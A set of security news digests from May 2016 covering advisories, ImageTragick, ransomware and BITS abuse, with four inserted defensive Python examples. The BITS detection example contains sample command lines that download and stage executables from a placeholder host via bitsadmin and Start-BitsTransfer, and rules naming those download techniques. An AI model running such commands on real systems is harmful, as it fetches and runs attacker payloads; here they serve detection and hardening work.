=======================
= End-of-Shift report =
=======================
Timeframe: Monday 09-05-2016 18:00 − Tuesday 10-05-2016 18:00
Handler: Stephan Richter
Co-Handler: Alexander Riepl
*** [Xen-announce] Xen Security Advisory 179 (CVE-2016-3710, CVE-2016-3712) - QEMU: Banked access to VGA memory (VBE) uses inconsistent bounds checks ***
---------------------------------------------
The QEMU VGA module allows banked access to video memory using the window at 0xa0000, and it supports different access modes with different address calculations. But an attacker can easily change access modes after setting the bank ..
---------------------------------------------
http://lists.xen.org/archives/html/xen-announce/2016-05/msg00001.html
*** Finding Conditional SEO Spam in Drupal ***
---------------------------------------------
Nobody likes spam. It's never fun (unless you're watching Monty Python). For us it comes with the territory; removing SEO spam has been at the core of ..
---------------------------------------------
https://blog.sucuri.net/2016/05/seo-spam-in-drupal-database.html
*** DSA-3572 websvn - security update ***
---------------------------------------------
Nitin Venkatesh discovered that websvn, a web viewer for Subversion repositories, is susceptible to cross-site scripting attacks via specially crafted file and directory names in repositories.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3572
*** Gamarue, Nemucod, and JavaScript ***
---------------------------------------------
JavaScript is now widely used to download malware because the code is easy to obfuscate and small in size. Most recently, one of the most prevalent JavaScript malware families spreading other malware is Nemucod. This ..
---------------------------------------------
https://blogs.technet.microsoft.com/mmpc/2016/05/09/gamarue-nemucod-and-jav…
*** Don't Put Off Till Tomorrow What You Should Start Today (Part 1) ***
---------------------------------------------
For some, the upcoming EU legislative changes (the General Data Protection Regulation, referred to as GDPR, and the Network and Information Security Directive, referred to as the NIS Directive) may have seemed like they ..
---------------------------------------------
http://researchcenter.paloaltonetworks.com/2016/05/cso-dont-put-off-till-to…
*** Performing network forensics with Dshell. Part 1: Basic usage, (Mon, May 9th) ***
---------------------------------------------
I found out recently there is a very interesting tool that enables some interesting capabilities to perform network forensics from a PCAP capture file. .. in the command prompt. There is a major keyword that launches ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21035
*** This is what a root debug backdoor in the Linux kernel looks like ***
---------------------------------------------
Allwinner's all-loser code makes it into shipped firmware. A root backdoor for debugging Android gadgets managed to end up in shipped firmware, and we're surprised this sort of colossal blunder doesn't happen more often.
---------------------------------------------
www.theregister.co.uk/2016/05/09/allwinners_allloser_custom_kernel_has_a_na…
*** DSA-3573 qemu - security update ***
---------------------------------------------
https://www.debian.org/security/2016/dsa-3573
*** SS7 spookery on the cheap allows hackers to impersonate mobile chat subscribers ***
---------------------------------------------
Flaws in the mobile signalling protocols can be abused to read messaging apps such as WhatsApp and Telegram.
---------------------------------------------
www.theregister.co.uk/2016/05/10/ss7_mobile_chat_hack/
*** Security Advisory: ImageMagick vulnerability CVE-2016-3714 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/03/sol03151140.html
*** Let's stop talking password flaws and instead discuss access management ***
---------------------------------------------
A good bit of attention has been given to a new report that suggests that there are organizations that don't change their administrative passwords at all, ever. While it may be a bit eye opening that many IT professionals said they did not ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/05/10/password-flaws-access-management/
*** xt:Commerce: urgent patches, no details ***
---------------------------------------------
The vendor of the online shop system xt:Commerce is currently distributing a security patch. Affected admins should install the fixed versions with "very high ..
---------------------------------------------
http://heise.de/-3200152
*** Hacker Challenges ***
---------------------------------------------
Want to get started hacking things but don't want to do anything illegal? Here are some challenges others have made to help you practice some hacking skills. By participating in the challenges you could learn the following ..
---------------------------------------------
https://www.tunnelsup.com/hacker-challenges/
*** Ransomware Is Not a 'Malware Problem' - It's a Criminal Business Model ***
---------------------------------------------
Today Unit 42 published our latest paper on ransomware, which has quickly become one of the greatest cyberthreats facing organizations around the world. As a business model, ransomware has proven to be highly effective ..
---------------------------------------------
http://researchcenter.paloaltonetworks.com/2016/05/unit-42-ransomware-trend…
*** Lateral Movement: Do You Have Enough Eyes? ***
---------------------------------------------
Sophisticated attackers can find their way into a corporate network in many ways. An attack could come from an external source, through the exploitation of a service, or by being brought in by a user whose laptop has been infected while ..
---------------------------------------------
http://resources.infosecinstitute.com/lateral-movement-do-you-have-enough-e…
*** Evil images: active attacks on websites via ImageMagick ***
---------------------------------------------
The grace period is over. Anyone running an unpatched ImageMagick on their server should act immediately, because exploits are now in circulation.
---------------------------------------------
http://heise.de/-3200773
*** Xen Security Advisory CVE-2016-3710,CVE-2016-3712 / XSA-179 ***
---------------------------------------------
http://xenbits.xen.org/xsa/advisory-179.txt
*** IBM Security Bulletin: Vulnerabilities in OpenSource PHP Affect IBM Lotus Protector For Mail Security (CVE-2016-3142 ) ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg21981983
*** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM SmartCloud Provisioning for IBM Software Virtual Appliance ***
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg2C1000128
*** Hackers paradise: Outdated Internet Explorer, Flash installs in enterprises ***
---------------------------------------------
Two in five Flash users DO update. Surprised? A quarter of all Windows devices are running outdated and unsupported versions of Internet Explorer, exposing users to more ..
---------------------------------------------
www.theregister.co.uk/2016/05/10/ie_flash_vulns_rife/
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 06-05-2016 18:00 − Monday 09-05-2016 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Symantec Endpoint Encryption Unquoted Service Path Local Elevation of Privilege ***
---------------------------------------------
CVSS2 Base Score: 6.8
Symantec Endpoint Encryption (SEE) has an unquoted search path in EEDService. This could provide a non-privileged local user the ability to successfully insert arbitrary code in the root path.
---------------------------------------------
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se…
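The advisory above says only that the EEDService path is unquoted. What that means in practice is that Windows resolves an unquoted path with spaces by trying successively longer prefixes with ".exe" appended, so a local user who can write to one of those intermediate locations gets code run as the service account. The following is an added example, not Symantec's code: it computes the candidate paths Windows would try and audits a constructed service list (the paths in SAMPLE_SERVICES are illustrative, not the real EEDService install location).

```python
"""Unquoted service path: which files does Windows try before the real binary?

Added example for the Symantec Endpoint Encryption item above. This is not
Symantec's code, and SAMPLE_SERVICES is a constructed list: the paths are
illustrative and are not the real EEDService install location.
"""


def hijack_candidates(image_path: str) -> list:
    """Return the executables CreateProcess would try, in order, for an
    unquoted ImagePath. The last entry is the intended binary; every entry
    before it is a file a local user could plant if the directory is writable.
    A quoted path yields an empty list because there is no ambiguity.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return []
    tokens = path.split(" ")
    # Command-line arguments after the .exe do not take part in the lookup.
    exe_idx = next(
        (i for i, t in enumerate(tokens) if t.lower().endswith(".exe")),
        len(tokens) - 1,
    )
    tokens = tokens[: exe_idx + 1]
    partial = [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]
    return partial + [" ".join(tokens)]


def is_unquoted_path_vulnerable(image_path: str) -> bool:
    """True when the service binary lives under an unquoted path containing
    a space, i.e. when at least one hijack candidate precedes the real binary.
    """
    return len(hijack_candidates(image_path)) > 1


def audit_services(services: dict) -> dict:
    """Map each vulnerable service name to the paths an attacker could plant.
    On a live host the input would come from
    HKLM\\SYSTEM\\CurrentControlSet\\Services\\<name>\\ImagePath.
    """
    findings = {}
    for name, image_path in services.items():
        if is_unquoted_path_vulnerable(image_path):
            findings[name] = hijack_candidates(image_path)[:-1]
    return findings


# Constructed sample, not taken from a real system.
SAMPLE_SERVICES = {
    "GoodSvc": r'"C:\Program Files\Good Vendor\good.exe" -service',
    "svchost_like": r"C:\Windows\System32\svchost.exe -k netsvcs",
    "EEDService_like": r"C:\Program Files\Some Vendor\Endpoint Tools\EEDService.exe",
}

if __name__ == "__main__":
    for svc, paths in audit_services(SAMPLE_SERVICES).items():
        print(svc)
        for p in paths:
            print("  could be hijacked via", p)
```

Flagging the path is only half the check: exploitation additionally requires that the user can create a file at one of the candidate locations (for example a writable "C:\Program Files\Some Vendor\" directory), so a real audit should test the ACL on each candidate's parent directory as well.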
*** WordPress 4.5.2 Security Release ***
---------------------------------------------
WordPress 4.5.2 is now available. This is a security release for all previous versions and we strongly encourage you to update your sites immediately.
WordPress versions 4.5.1 and earlier are affected by a SOME (same-origin method execution) vulnerability through Plupload, the third-party library WordPress uses for uploading files. WordPress versions 4.2 through 4.5.1 are vulnerable to reflected XSS using specially crafted URIs through MediaElement.js, the third-party library used for media players. MediaElement.js and Plupload have also released updates fixing these issues.
---------------------------------------------
https://wordpress.org/news/2016/05/wordpress-4-5-2/
*** Lenovo Patches Serious Flaw In Pre-Installed Support Tool ***
---------------------------------------------
Reader itwbennett writes: Lenovo has made available a patch for the vulnerability in its Lenovo Solution Center, a support tool which comes pre-installed on many Lenovo laptops and desktops. The vulnerability could allow attackers to execute code with system privileges and take over computers. Users should automatically be prompted to update LSC when they open the application, but in case they aren't, they should download the latest version (3.3.002) manually from Lenovo's website.
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/8xQvMt43Nw8/lenovo-patches-…
*** The massive password breach that wasn't: Google says data is 98% 'bogus' ***
---------------------------------------------
When a script kiddie sells 272 million accounts for $1, be very, very skeptical.
---------------------------------------------
http://arstechnica.com/security/2016/05/the-massive-password-breach-that-wa…
*** Security Advisory: OpenSSL vulnerability CVE-2016-2109 ***
---------------------------------------------
The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in the ASN.1 BIO implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (memory consumption) via a short invalid encoding.
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/23/sol23230229.html?…
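The CVE text above describes the bug class exactly: a reader that sizes its buffer from a length field the peer controls, so a few bytes of invalid encoding can demand gigabytes. The following is an added example, not OpenSSL code and not a reproduction of asn1_d2i_read_bio: it parses a DER tag/length header, shows what a trusting reader would allocate, and places a bounded reader next to it. GOOD and EVIL are constructed byte strings.

```python
"""Declared DER length vs. available data: the bug class behind the
OpenSSL CVE-2016-2109 item above (memory consumption from a short,
invalid encoding).

Added example, not OpenSSL code: it models a reader that sizes its buffer
from the attacker-controlled length field, next to one that bounds that
length by the data actually present and by a hard cap. The byte strings
are constructed inline.
"""


def parse_der_header(buf: bytes):
    """Return (tag, declared_length, header_len) for the TLV starting at buf[0]."""
    if len(buf) < 2:
        raise ValueError("truncated header")
    tag, first = buf[0], buf[1]
    if first < 0x80:                      # short form: one-byte length
        return tag, first, 2
    n = first & 0x7F                      # long form: n length bytes follow
    if n == 0 or n > 4:
        raise ValueError("indefinite or oversized length is not valid DER")
    if len(buf) < 2 + n:
        raise ValueError("truncated length field")
    return tag, int.from_bytes(buf[2:2 + n], "big"), 2 + n


def naive_buffer_size(buf: bytes) -> int:
    """Bytes a trusting reader would allocate: whatever the header declares,
    regardless of how much data follows. A 6-byte input can demand ~4 GiB.
    """
    return parse_der_header(buf)[1]


def read_tlv_bounded(buf: bytes, max_len: int = 1 << 20):
    """Hardened reader: refuse lengths beyond a cap and beyond the data present
    before allocating anything. Returns (tag, value)."""
    tag, length, hdr = parse_der_header(buf)
    if length > max_len:
        raise ValueError(f"declared length {length} exceeds cap {max_len}")
    if length > len(buf) - hdr:
        raise ValueError("declared length exceeds available data")
    return tag, bytes(buf[hdr:hdr + length])


def bounded_reader_rejects(buf: bytes) -> bool:
    """True when the hardened reader refuses the input."""
    try:
        read_tlv_bounded(buf)
    except ValueError:
        return True
    return False


# Constructed inputs. GOOD is SEQUENCE { INTEGER 5 }; EVIL is a 6-byte
# SEQUENCE header whose long-form length claims 0xFFFFFFF0 bytes of content.
GOOD = bytes([0x30, 0x03, 0x02, 0x01, 0x05])
EVIL = bytes([0x30, 0x84, 0xFF, 0xFF, 0xFF, 0xF0])

if __name__ == "__main__":
    print("good:", read_tlv_bounded(GOOD))
    print("evil would allocate", naive_buffer_size(EVIL),
          "bytes from", len(EVIL), "input bytes")
    print("bounded reader rejects evil:", bounded_reader_rejects(EVIL))
```

The principle is the same whether the data arrives in one buffer or is pulled through a stream as OpenSSL's BIO reader does: never size an allocation from a peer-controlled length without a cap, and fail before allocating when the declared length cannot possibly be satisfied.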
*** Analyzing ImageTragick Exploits in the Wild ***
---------------------------------------------
Three days ago the ImageMagick (ImageTragick) vulnerability was released to the world. We've been actively monitoring as promised, and have started to see a few different attacks targeting the vulnerability. Interestingly enough, the attacks themselves seem to be targeted against specific customers and not mass blanket attacks, which is what you'd expect ...
---------------------------------------------
https://blog.sucuri.net/2016/05/analyzing-imagetragick-exploits-in-the-wild…
*** "Detecting the Siemens S7 Worm and Similar Capabilities" ***
---------------------------------------------
An article came out on May 5th titled "Daisy-chained research spells malware worm hell for power plants and other utilities" with the subtitle of "World's first PLC worm spreads like cancer". Having been on the receiving end of sensationalized headlines before, I empathize with the authors of the research...
---------------------------------------------
http://ics.sans.org/blog/2016/05/08/detecting-the-siemens-s7-worm-and-simil…
*** World Password Day--Dont be an easy target ***
---------------------------------------------
Thursday, May 5th, marks the 'celebration' of the fourth annual World Password Day.
..
* Have you updated the passwords on all of your accounts within the last three months?
* Have you enabled two-factor authentication on accounts that allow it?
* Are you using the strongest possible combinations of numbers, letters and symbols allowed by the site?
* Are you using different passwords for every account (no duplicates or very similar variations)?
---------------------------------------------
http://community.hpe.com/t5/Protect-Your-Assets/World-Password-Day-Don-t-be…
*** AlphaLocker Is the Most Professional Ransomware Kit to Date ... but security researchers already cracked it ***
---------------------------------------------
Luckily for us, other security experts have already cracked its secrets over the past weekend, and a decrypter was published that helps any of the infected victims recover their files for free, without paying the ransom. Nevertheless, here's a small intro into how crooks are creating, advertising, and then selling ransomware on the underground market.
---------------------------------------------
http://news.softpedia.com/news/alphalocker-is-the-most-professional-ransomw…
*** ImageMagick Vulnerability Information ***
---------------------------------------------
A few days ago an ImageMagick vulnerability was disclosed dubbed 'ImageTragick' that affects WordPress websites whose host has ImageMagick installed. If you control your own hosting for your WordPress site, you should look to implement the following fix(es) immediately.
---------------------------------------------
https://make.wordpress.org/core/2016/05/06/imagemagick-vulnerability-inform…
*** WordPress plugin remains unfixed ***
---------------------------------------------
A security researcher disclosed two vulnerabilities in the WordPress extension Event-Registration; the vendors, however, are not responding.
---------------------------------------------
http://heise.de/-3198956
*** Penetration Testing of a Citrix Server ***
---------------------------------------------
Here I'll discuss how I did a pentest of a Citrix server in a lab network. First, let us understand about Windows terminal service. Microsoft Windows Terminal Services, otherwise known as Remote Desktop Services, is one of the components of Windows 2003-08 Server, which allows multiple sessions to run the application over it.
---------------------------------------------
http://resources.infosecinstitute.com/penetration-testing-of-a-citrix-serve…
*** Security Advisory - XSS Vulnerability in the Email App of Huawei Smartphone ***
---------------------------------------------
There is a vulnerability due to the lack of output encoding for certain characters in the email app built into the affected smartphones. Successful exploitation of the vulnerability could allow an unauthenticated remote attacker to perform a cross-site scripting (XSS) attack and obtain user information.
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2016/huawei-sa-20160507-…
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in IBM Java SDK affect IBM Tivoli Composite Application Manager for Transactions (CVE-2016-0363 and CVE-2016-0376) ***
http://www.ibm.com/support/docview.wss?uid=swg21982634
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM InfoSphere Master Data Management (CVE-2016-2842) ***
http://www.ibm.com/support/docview.wss?uid=swg21982353
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Storwize V7000 Unified - CVE-2016-0800 ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005717
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM SONAS - CVE-2016-0800 ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005716
---------------------------------------------
*** IBM Security Bulletin: Apache Tomcat vulnerability affects IBM SONAS (CVE-2015-5345) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005712
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in InstallShield affects IBM Tivoli Storage Manager HSM for Windows (CVE-2016-2542) ***
http://www.ibm.com/support/docview.wss?uid=swg21982741
---------------------------------------------
*** IBM Security Bulletin: IBM Forms Viewer Installation could allow a remote attacker to execute arbitrary code on the system (CVE-2016-2542) ***
http://www.ibm.com/support/docview.wss?uid=swg21982440
---------------------------------------------
*** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM SONAS (CVE-2015-7547) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005681
---------------------------------------------
*** IBM Security Bulletin: Potential vulnerabilities in IBM OpenPages GRC Platform with Database ***
http://www.ibm.com/support/docview.wss?uid=swg21982461
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in TLS affects IBM SONAS (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005722
---------------------------------------------
*** IBM Security Bulletin: Samba vulnerability issues on IBM SONAS (CVE-2015-5252, CVE-2015-5296, and CVE-2015-5299) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005693
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Apache Cordova Android may affect IBM WebSphere Portal (CVE-2015-5256) ***
http://www.ibm.com/support/knowledgecenter/SSHRKX_8.5.0/mp/integrate/wl_int…
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM SONAS (CVE-2015-1794, CVE-2015-3194, CVE-2015-3195, and CVE-2015-3196) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005694
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in GSKit affect Tivoli Workload Scheduler (CVE-2015-7421, CVE-2015-7420) ***
http://www.ibm.com/support/docview.wss?uid=swg21982432
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Liberty for Java for IBM Bluemix April 2016 CPU (CVE-2016-3426, CVE-2016-3427) ***
http://www.ibm.com/support/docview.wss?uid=swg21982850
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 04-05-2016 18:00 − Friday 06-05-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Microsoft to retire support for SHA1 certificates in the next 4 months ***
---------------------------------------------
The lock icon will be gone by summer; sites using SHA1 to be blocked come January.
---------------------------------------------
http://arstechnica.com/security/2016/05/microsoft-to-retire-support-for-sha…
*** Austria on the lookout for young hackers ***
---------------------------------------------
At the Cyber Security Challenge 2016, the Abwehramt (Austrian military intelligence) and the association Cyber Security Austria are looking for young hacking talent for the fifth time.
---------------------------------------------
http://futurezone.at/digital-life/oesterreich-auf-der-suche-nach-nachwuchs-…
*** ImageTragick: Another Vulnerability, Another Nickname, (Thu, May 5th) ***
---------------------------------------------
Introduction: On Tuesday 2016-05-03, we started seeing reports about a vulnerability for a cross-platform suite named ImageMagick [1, 2, 3]. This new vulnerability has been nicknamed ImageTragick and has its own website. Apparently, the vulnerability will be assigned to CVE-2016-3714. It wasn't yet on mitre.org's CVE site when I wrote this diary. Johannes Ullrich already discussed this vulnerability in yesterday's ISC StormCast for 2016-05-04, but there's been more press about it. Should...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21023&rss
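Both the WordPress note earlier in this report ("implement the following fix(es) immediately") and the ISC diary above point at the same two mitigations for ImageTragick: stop ImageMagick from reaching the dangerous coders via policy.xml, and refuse uploads whose bytes do not match the image type they claim, because ImageMagick chooses the coder from the file content, not the extension. The following is an added example, not code from ImageMagick, WordPress or SANS ISC; the sample uploads and both policy.xml documents are constructed, and RISKY_CODERS is the initial list published with the advisory, which was later extended.

```python
"""Two server-side checks for ImageTragick (CVE-2016-3714):
(1) reject uploads whose bytes do not match the image type they claim, since
ImageMagick picks the coder from content, not from the extension;
(2) audit policy.xml for the coders the ImageTragick advisory said to disable.

Added example, not code from ImageMagick, WordPress or SANS ISC. The sample
files and both policy.xml documents are constructed inline; RISKY_CODERS is
the initial list published with the advisory, which later grew.
"""
import xml.etree.ElementTree as ET

# Leading bytes of the formats an upload form is likely to allow.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

RISKY_CODERS = {"EPHEMERAL", "URL", "HTTPS", "MVG", "MSL"}


def content_matches_extension(data: bytes, filename: str) -> bool:
    """True only if the file starts with a known signature for its extension.
    Unknown extensions are rejected rather than passed through."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return any(data.startswith(sig) for sig in MAGIC.get(ext, ()))


def coders_still_enabled(policy_xml: str) -> set:
    """Return the risky coders that policy.xml does not set to rights="none"."""
    root = ET.fromstring(policy_xml)
    disabled = {
        (p.get("pattern") or "").upper()
        for p in root.iter("policy")
        if p.get("domain") == "coder" and p.get("rights") == "none"
    }
    return RISKY_CODERS - disabled


# Constructed samples.
PNG_UPLOAD = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
# A harmless MVG drawing script; ImageMagick would hand it to the MVG coder
# no matter what extension the uploader chose for it.
MVG_UPLOAD = b"push graphic-context\nviewbox 0 0 640 480\npop graphic-context\n"

DEFAULT_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
</policymap>"""

HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="none" pattern="HTTPS"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
</policymap>"""

if __name__ == "__main__":
    print("photo.png accepted:", content_matches_extension(PNG_UPLOAD, "photo.png"))
    print("disguised.png accepted:", content_matches_extension(MVG_UPLOAD, "disguised.png"))
    print("default policy leaves enabled:", sorted(coders_still_enabled(DEFAULT_POLICY)))
    print("hardened policy leaves enabled:", sorted(coders_still_enabled(HARDENED_POLICY)))
```

The magic-byte check belongs in the upload handler before anything calls convert or identify; the policy audit belongs in configuration management, since a package upgrade can silently replace policy.xml. Neither check substitutes for the vendor patch.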
*** Jaku botnet hides targeted attacks within generic botnet noise ***
---------------------------------------------
Botnets are usually created by cyber criminals that use them to launch DDoS attacks, deliver spam, effect click fraud. The recently discovered Jaku botnet can effectively do all those things, if its botmaster(s) choose to do so, but it seems that they have other things in mind. The botnet which, according to Forcepoint researchers, numbered as many as 17,000 victims at different points in time, consists of several botnets "answering to" different C&C servers. The...
---------------------------------------------
https://www.helpnetsecurity.com/2016/05/05/jaku-botnet-targeted-attacks/
*** Juniper patches OpenSSHs roaming bug in Junos OS ***
---------------------------------------------
ScreenOS not affected. The next vendor to kill off the OpenSSH roaming bug announced in January is Juniper Networks.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/05/05/juniper_pat…
*** Criminals Peddling Affordable AlphaLocker Ransomware ***
---------------------------------------------
A relatively affordable and difficult to detect ransomware-as-a-service named AlphaLocker has begun making the rounds, researchers warn.
---------------------------------------------
http://threatpost.com/criminals-peddling-affordable-alphalocker-ransomware/…
*** Microsoft BITS Used to Download Payloads, (Thu, May 5th) ***
---------------------------------------------
A few days ago, I found an interesting malicious Word document. First of all, the file has a very low score on VT: 2/56 (analysis is available here). The document is a classic one: once opened, it asks the victim to enable macro execution if not yet enabled. The document targets .. The OLE document contains:
$ oledump.py b2a9d203bb135b54319a9e5cafc43824
  1:       113 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      9398 '1Table'
  5: ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21027&rss
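The diary's point is that the macro does not download anything itself; it hands the job to the Background Intelligent Transfer Service, which is a signed Windows component and blends in with legitimate update traffic. The added example below (not code from the diary) shows the detection a SOC would run over process-creation telemetry for this technique: bitsadmin with a transfer verb, the Start-BitsTransfer PowerShell cmdlet, and an Office application spawning a shell. The log lines are constructed (tab-separated time, parent image, image, command line) and 203.0.113.10 is a documentation address, not a real host.

```python
"""Spotting BITS-based payload downloads in process-creation telemetry,
as a follow-on to the ISC diary above on a macro that uses Microsoft BITS.

Added example, not code from the diary. The log lines are constructed
(tab-separated: time, parent image, image, command line) and the download
host is a placeholder; a real deployment would read Sysmon event ID 1 or
Windows 4688 events with command-line auditing enabled.
"""
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "bitsadmin.exe"}
BITSADMIN_VERBS = ("/transfer", "/addfile", "/create", "/resume", "/setnotifycmdline")


def classify(line: str) -> list:
    """Return the detection names that fire on one log line."""
    try:
        _, parent, image, cmdline = line.rstrip("\n").split("\t", 3)
    except ValueError:
        return ["malformed-line"]
    parent_exe = ntpath.basename(parent).lower()
    image_exe = ntpath.basename(image).lower()
    cl = cmdline.lower()
    hits = []
    # bitsadmin.exe invoked with a verb that creates or drives a download job
    if "bitsadmin" in cl and any(v in cl for v in BITSADMIN_VERBS):
        hits.append("bitsadmin-transfer")
    # the PowerShell cmdlet that drives the same service
    if "start-bitstransfer" in cl:
        hits.append("powershell-bits")
    # an Office document should not be launching interpreters or shells
    if parent_exe in OFFICE_APPS and image_exe in SHELLS:
        hits.append("office-spawns-shell")
    return hits


def scan(lines) -> dict:
    """Map line index -> detections for every line that triggered something."""
    return {i: h for i, h in ((i, classify(l)) for i, l in enumerate(lines)) if h}


# Constructed sample telemetry.
SAMPLE_LOG = [
    "2016-05-05T09:12:01\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\svchost.exe\t"
    "svchost.exe -k netsvcs",
    "2016-05-05T09:14:22\tC:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE\t"
    "C:\\Windows\\System32\\cmd.exe\t"
    "cmd /c bitsadmin /transfer upd /download /priority high http://203.0.113.10/x.exe %TEMP%\\x.exe",
    "2016-05-05T09:14:23\tC:\\Windows\\System32\\cmd.exe\tC:\\Windows\\System32\\bitsadmin.exe\t"
    "bitsadmin /transfer upd /download /priority high http://203.0.113.10/x.exe C:\\Users\\u\\AppData\\Local\\Temp\\x.exe",
    "2016-05-05T10:01:05\tC:\\Windows\\explorer.exe\t"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "powershell -w hidden Start-BitsTransfer -Source http://203.0.113.10/y.ps1 -Destination $env:TEMP\\y.ps1",
    "2016-05-05T10:30:00\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\bitsadmin.exe\t"
    "bitsadmin /list",
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

Note the last sample line: "bitsadmin /list" is what an administrator runs to inspect jobs and is deliberately not flagged; matching on the executable name alone would bury the real hits in noise. The parent/child rule is the most durable of the three, since it fires regardless of which downloader the macro chooses.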
*** On The Monetization Of Crypto-Ransomware ***
---------------------------------------------
Over the last few years, technologies and infrastructure, in the form of crypto-currencies, the dark web and well-organized criminal affiliate programs have aligned to create the perfect storm. And from that storm, the crypto-ransomware beast has arisen. There's a reason why crypto-ransomware is making the news almost daily - it's unique compared to every other...
---------------------------------------------
https://labsblog.f-secure.com/2016/05/06/on-the-monetization-of-crypto-rans…
*** Study: TLS proxies introduce security problems ***
---------------------------------------------
Among 14 antivirus and parental-control products that filter content inside secured TLS connections, not a single one was found that did not itself cause additional security problems while doing so.
---------------------------------------------
http://heise.de/-3197932
*** Qualcomm flaw puts millions of Android devices at risk ***
---------------------------------------------
A vulnerability in an Android component shipped with phones that use Qualcomm chips puts users' text messages and call history at risk of theft. The flaw was found by security researchers from FireEye and was patched by Qualcomm in March. However, because the vulnerability was introduced five years ago, many affected devices are unlikely to ever receive the fix because they're no longer supported by their manufacturers. The vulnerability, which is tracked as CVE-2016-2060, is located in an Android...
---------------------------------------------
http://www.cio.com/article/3066827/qualcomm-flaw-puts-millions-of-android-d…
*** Security Alert: New Ransomware Promises to Donate Earnings to Charity ***
---------------------------------------------
Psychological manipulation is heavily used in cyber attacks, especially in phishing and ransomware compromise attempts. As with all online scams, the attackers' main objective is simple: to make as much money and steal as much data as possible. So, in their malicious pursuit, they'll come up with new tactics to force their victims into complying with their conditions. Encrypting ransomware, such as CryptoWall or TeslaCrypt, is proof.
---------------------------------------------
https://heimdalsecurity.com/blog/security-alert-new-ransomware-donate-earni…
*** New Security Flaw Found in Lenovo Solution Center Software ***
---------------------------------------------
Security researchers at Trustwave SpiderLabs have discovered a new vulnerability in Lenovo's much maligned Lenovo Solution Center software. The vulnerability allows attackers with local network access to a PC to execute arbitrary code.
---------------------------------------------
http://threatpost.com/new-security-flaw-found-in-lenovo-solution-center-sof…
*** Public Key Infrastructure (PKI) ***
---------------------------------------------
Executive Summary This article is a detailed theoretical and hands-on with Public Key Infrastructure (PKI) and OpenSSL based Certificate Authority. In the first section, PKI and its associated concepts will be discussed. A test bed or lab environment on Ubuntu 14 will be prepared to apply PKI knowledge. Generation of CA, server and user keys/certificates...
---------------------------------------------
http://resources.infosecinstitute.com/public-key-infrastructure-pki-2/
*** Upcoming Security Updates for Adobe Acrobat and Reader (APSB16-14) ***
---------------------------------------------
A prenotification Security Advisory (APSB16-14) has been posted regarding upcoming releases for Adobe Acrobat and Reader scheduled for Tuesday, May 10, 2016. We will continue to provide updates on the upcoming releases via the Security Advisory as well as the...
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1344
*** Squid HTTP caching proxy Multiple Vulns ***
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016050024
*** [R1] PHP < 5.6.21 Vulnerabilities Affect Tenable SecurityCenter ***
---------------------------------------------
http://www.tenable.com/security/tns-2016-09
